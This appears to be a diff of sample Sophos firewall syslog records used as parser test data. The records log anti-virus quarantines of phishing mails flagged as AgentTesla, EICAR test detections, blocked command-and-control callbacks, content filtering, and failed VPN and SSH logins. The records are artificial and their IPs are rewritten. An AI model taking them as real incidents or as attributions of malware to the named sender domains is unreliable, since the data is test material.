dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" <30>device="SFW" date=2018-06-06 time=10:51:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036106211001 log_type="Anti-Virus" log_component="POPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="pankhil@postman.local" subject="EICAR" mailid="" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=10:58:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036206212001 log_type="Anti-Virus" log_component="IMAPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="ganga@postman.local" subject="EICAR test email" mailid="<2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local>" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-21 time=19:50:23 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031006209001 log_type="Anti-Virus" log_component="FTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" virus="EICAR-AV-Test" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Upload" filename=" /home/ftp-user/ta_test_file_1ta-cl1-46" file_size=0 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="STOR" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol="TCP" src_port=39910 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2018-06-21 time=19:50:48 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031001609002 log_type="Anti-Virus" log_component="FTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" virus="" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Download" filename="/home/ftp-user /ta_test_file_1ta-cl1-46" file_size=19926248 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="RETR" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol="TCP" src_port=39936 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=19926248 -<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=46.161.30.47 url=46.161.30.47 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=82.211.30.202 url=82.211.30.202 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" -<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname="" -<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" -<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://40.90.137.127/" contenttype="" override_token="" httpresponsecode="" src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" +<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=175.16.199.1 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" +<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname="" +<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" +<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://175.16.199.1/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SF01V" device_id=1234567890123456 log_id=058420116010 log_type="Content Filtering" log_component="Web Content Policy" log_subtype="Alert" user="gi123456" src_ip=10.108.108.49 transaction_id="e4a127f7-a850-477c-920e-a471b38727c1" dictionary_name="complicated_Custom" site_category=Information Technology website="ta-web-static-testing.qa. astaro.de" direction="in" action="Deny" file_name="cgi_echo.pl" context_match="Not" context_prefix="blah blah hello " context_suffix=" hello blah " -<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" -<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible" -<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=172.17.35.116 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116" name="elastic.user@elastic.test.com" src_mac= -<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=83.20.132.250 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)" +<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" +<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible" +<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1" name="elastic.user@elastic.test.com" src_mac= +<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=175.16.199.1 localgateway="" localnetwork="175.16.199.1/19" remoteinterfaceip=175.16.199.1 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)" <30>device="SFW" date=2020-05-18 time=14:38:59 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511318057 log_type="Event" log_component="IPSec" log_subtype="System" status="Expire" priority=Error user_name="" connectionname="" connectiontype="0" localinterfaceip="" localgateway="" localnetwork="" remoteinterfaceip="" remotenetwork="" message="IKE_SA timed out before it could be established" -<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=83.9.140.96 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:01 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=064011517819 log_type="Event" log_component="Anti-Virus" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.407794 newversion=1.0.407795 message="Avira AV definitions upgraded from 1.0.407794 to 1.0.407795." <30>device="SFW" date=2020-05-18 time=14:39:02 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=063411660022 log_type="Event" log_component="DHCP Server" log_subtype="System" status="Expire" priority=Information ipaddress="192.168.110.10" client_physical_address="-" client_host_name="" message="Lease 192.168.110.10 expired" raw_data="192.168.110.10" -<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=217.250.157.135 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:04 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062811617824 log_type="Event" log_component="SSL VPN" log_subtype="System" priority=Information Mode="Remote Access" sessionid="" starttime=0 user_name="elastic.user@elastic.test.com" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status="Established" message="SSL VPN User 'elastic.user@elastic.test.com' connected " timestamp=1589960866 connectionname="" remote_ip=10.82.234.12 -<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=91.67.201.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=175.16.199.1 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:06 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=066911518017 log_type="Event" log_component="ATP" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.0297 newversion=1.0.0298 message="ATP definitions upgraded from 1.0.0297 to 1.0.0298." <30>device="SFW" date=2020-05-18 time=14:39:07 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062009617502 log_type="Event" log_component="GUI" log_subtype="Admin" status="Successful" priority=Information user_name="admin" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message="SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'" -<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=172.66.35.15 message="User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials" +<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=175.16.199.1 message="User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials" <30>device="SFW" date=2020-05-18 time=14:39:09 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063911517818 log_type="Event" log_component="IPS" log_subtype="System" priority=Notice status="Successful" oldversion=9.17.09 newversion=9.17.10 message="IPS definitions upgraded from 9.17.09 to 9.17.10." <30>device="SFW" date=2020-05-18 time=14:39:10 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063311617923 log_type="Event" log_component="Appliance" log_subtype="System" priority=Information backup_mode='appliance' message="Scheduled backup to appliance is successful." <30>device="SFW" date=2020-05-18 time=14:39:20 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062910617703 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="VPN.SSL.Users.elastic" auth_client="IPSec" auth_mechanism="N/A" reason="" src_ip=10.84.234.38 src_mac="" start_time=1591086575 sent_bytes=0 recv_bytes=0 message="User elastic.user@elastic.test.com was logged out of firewall" name="elastic.user@elastic.test.com" timestamp=1591086576 @@ -49,29 +49,29 @@ <30>device="SFW" date=2017-03-16 time=12:53:27 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Disconnected" eventtime="2017-03-16 12:53:27 IST" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message="A350196C47072B0/Gaurav Patel is now disconnected" <30>device="SFW" date=2017-03-16 time=12:46:26 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Interim" eventtime="2017-03-16 12:46:26 IST" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message="A350196C47072B0/NY transfered bytes TX: 0 RX: 0" <30>device="SFW" date=2018-06-06 time=11:12:10 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=063711517815 log_type="Event" log_component="DDNS" log_subtype="System" status="Success" priority=Notice host=test1.customtest.dyndns.org updatedip=10.198.232.86 reason="" message="DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86." -<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 